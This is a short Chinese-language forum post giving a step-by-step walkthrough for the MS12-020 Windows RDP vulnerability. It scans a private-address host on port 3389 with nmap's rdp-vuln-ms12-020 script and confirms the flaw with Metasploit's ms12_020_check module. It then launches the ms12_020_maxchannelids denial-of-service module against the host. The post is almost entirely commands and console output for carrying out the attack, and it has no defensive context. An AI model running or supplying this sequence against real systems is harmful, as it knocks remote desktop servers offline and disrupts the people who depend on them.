社区 › Bug提交 › MS12_020 漏洞利用

admin 发表于 2018-4-15 11:45:34

MS12_020 漏洞利用

先启动postgresql数据库
service postgresql start
利用nmap扫描漏洞
    1. nmap
    root@MiWiFi-R1CL-srv:~# cd /usr/share/nmap/scripts/
    root@MiWiFi-R1CL-srv:/usr/share/nmap/scripts# ls |grep rdp
    http-wordpress-brute.nse
    http-wordpress-enum.nse
    http-wordpress-users.nse
    rdp-enum-encryption.nse
    rdp-vuln-ms12-020.nse
   
    2. nmap -vv --open -p 3389 --script=rdp-vuln-ms12-020 192.168.159.128
   
    3. msfconsole
    search ms12-020
   
    (1) 漏洞检测
    msf > useauxiliary/scanner/rdp/ms12_020_check
    msf auxiliary(ms12_020_check) > set rhosts 192.168.159.128 设置远程ip
    msf auxiliary(ms12_020_check) > show options   查看配置
   
    Name   Current SettingRequiredDescription
       ----   ----------------------------------
       RHOSTS   192.168.159.128yes       The target address range or CIDR identifier
       RPORT    3389             yes       Remote port running RDP (TCP)
       THREADS1                yes       The number of concurrent threads
   
    msf auxiliary(ms12_020_check) > run

    [+] 192.168.159.128:3389- 192.168.159.128:3389 - The target is vulnerable.漏洞存在
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
   
    (2) 漏洞攻击
    msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    msf auxiliary(ms12_020_maxchannelids) > set rhost 192.168.159.128设置远程ip
    rhost => 192.168.159.128
    msf auxiliary(ms12_020_maxchannelids) > show options
    msf auxiliary(ms12_020_maxchannelids) > run

查看完整版本: MS12_020 漏洞利用